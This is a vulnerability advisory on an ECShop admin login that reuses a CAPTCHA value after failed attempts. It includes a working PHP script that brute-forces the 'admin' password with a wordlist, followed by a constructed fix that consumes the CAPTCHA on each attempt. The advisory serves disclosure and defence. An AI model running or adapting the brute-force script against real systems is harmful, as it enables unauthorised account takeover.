### Summary:

All popular versions are presumably affected by this issue.

### Details:

[![1.png](https://images.seebug.org/upload/201306/031052155bc2a633acc7f218ab49bf4514316332.png)](https://images.seebug.org/upload/201306/031052155bc2a633acc7f218ab49bf4514316332.png)

[![2.png](https://images.seebug.org/upload/201306/03105232b4e2c86353c3ff0eb989026ab3aece46.png)](https://images.seebug.org/upload/201306/03105232b4e2c86353c3ff0eb989026ab3aece46.png)

When the CAPTCHA does not match, the current CAPTCHA value is not destroyed. As a result, after requesting the CAPTCHA image once, the same value can be reused indefinitely as long as the CAPTCHA is not refreshed.

### Proof of vulnerability:

1. Obtain the correct CAPTCHA value.
2. Run the following script:

```php
<?php
$site='http://ecshop.com';
$admin_path='/admin/privilege.php';
$captcha='上一步获取的验证码';
$referer=$site;
$ch=curl_init(); // the cURL handle was never initialised in the original script

function getH($url,$postdata=array()){
    global $ch,$referer;
    $options = array(
        CURLOPT_URL => $url,
        CURLOPT_HEADER => false,
        CURLOPT_TIMEOUT=> 0.11,
        //CURLOPT_FILE=>$f,
        CURLOPT_RETURNTRANSFER=>true,
        CURLOPT_REFERER=>$referer,
        //CURLOPT_POST=>1,
        CURLOPT_HTTPHEADER=>array('Content-Type: application/x-www-form-urlencoded; charset=iso-8859-1','Expect:'),
        CURLOPT_USERAGENT=>'ie'
    );
    if(!empty($postdata)){
        $options[CURLOPT_POSTFIELDS]=http_build_query($postdata);
    }
    $ret = curl_setopt_array($ch,$options);
    //$ret = curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);// return a string instead of writing straight to the browser
    $ret = curl_exec($ch);
    $info = curl_getinfo($ch);
    if (empty($info['http_code'])) {
        die("No HTTP code was returned");
    } else if($info['http_code']==200) {// response code is 200
        return $ret;
    }else{
        #var_dump($info);
        echo '<br />';
        echo ('响应码:'.$info['http_code']);//
        echo '<br />';
        echo $postdata['username'].' 
---'.$postdata['password'];
        echo '<br />';
    }
}

$url=$site.$admin_path;
$data=array(
    'username'=>'admin',
    'password'=>'123456ad',
    'captcha'=>$captcha,
    'act'=>'signin'
);
// wordlist
$passwds=array('1','2','3','123456a','123456','123456ds');
foreach($passwds as $p){
    $data['password']=$p;
    $res= strip_tags(getH($url,$data));
    // stripos() returns 0 for a match at offset 0, so compare against false explicitly
    if(stripos($res,'您输入的帐号信息不正确')!==false){
        echo 'no';
    }
    echo ' ------------------------ ';
}
curl_close($ch);
```

[![22.png](https://images.seebug.org/upload/201306/0311024685d38a77ed95bec6b57d7c03057b2140.png)](https://images.seebug.org/upload/201306/0311024685d38a77ed95bec6b57d7c03057b2140.png)
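The fix for the behaviour described above is to consume the stored CAPTCHA on every login attempt, not only when the client requests a new image. The following is an added example in PHP, not ECShop's own code; the session key name, the password constant, the CAPTCHA answer and the wordlist are all constructed assumptions.

```php
<?php
// Added example, not ECShop's code: a login handler that consumes the
// CAPTCHA on every attempt, shown beside the pattern the report describes.
// Assumptions: the CAPTCHA answer lives in $_SESSION['captcha'] (modelled
// here as a plain array) and the password constant is a constructed value.
const CAPTCHA_KEY = 'captcha';
const CORRECT_PASSWORD = 'constructed-admin-password';

// Called when a CAPTCHA image is generated: stores the answer for later.
function issue_captcha(array &$session, string $answer): void {
    $session[CAPTCHA_KEY] = $answer;
}

// Pattern from the report: the stored answer is only compared, never
// removed, so it stays valid until the client asks for a new image.
function login_vulnerable(array &$session, string $captcha, string $password): string {
    $expected = $session[CAPTCHA_KEY] ?? null;
    if ($expected === null || strcasecmp($expected, $captcha) !== 0) {
        return 'captcha';    // wrong CAPTCHA; stored value is left as is
    }
    return hash_equals(CORRECT_PASSWORD, $password) ? 'ok' : 'password';
}

// Hardened: remove the stored answer before comparing, so one image
// buys exactly one attempt whether the CAPTCHA or the password fails.
function login_hardened(array &$session, string $captcha, string $password): string {
    $expected = $session[CAPTCHA_KEY] ?? null;
    unset($session[CAPTCHA_KEY]);    // consume first, compare second
    if ($expected === null || !hash_equals(strtolower($expected), strtolower($captcha))) {
        return 'captcha';
    }
    return hash_equals(CORRECT_PASSWORD, $password) ? 'ok' : 'password';
}

// Count how many password guesses reach the password stage on one CAPTCHA.
function attempts_reaching_password_stage(callable $login, array $guesses): int {
    $session = [];
    issue_captcha($session, 'ab3x');             // constructed CAPTCHA answer
    $reached = 0;
    foreach ($guesses as $guess) {
        if ($login($session, 'ab3x', $guess) === 'password') {
            $reached++;
        }
    }
    return $reached;
}
$guesses = ['1', '2', '3', '123456a', '123456'];   // constructed wordlist
echo "vulnerable: ", attempts_reaching_password_stage('login_vulnerable', $guesses), "\n";
echo "hardened:   ", attempts_reaching_password_stage('login_hardened', $guesses), "\n";
```

With the vulnerable handler every guess in the list passes the CAPTCHA stage on the single stored value; with the hardened handler only the first does, and each further guess costs the client a fresh image.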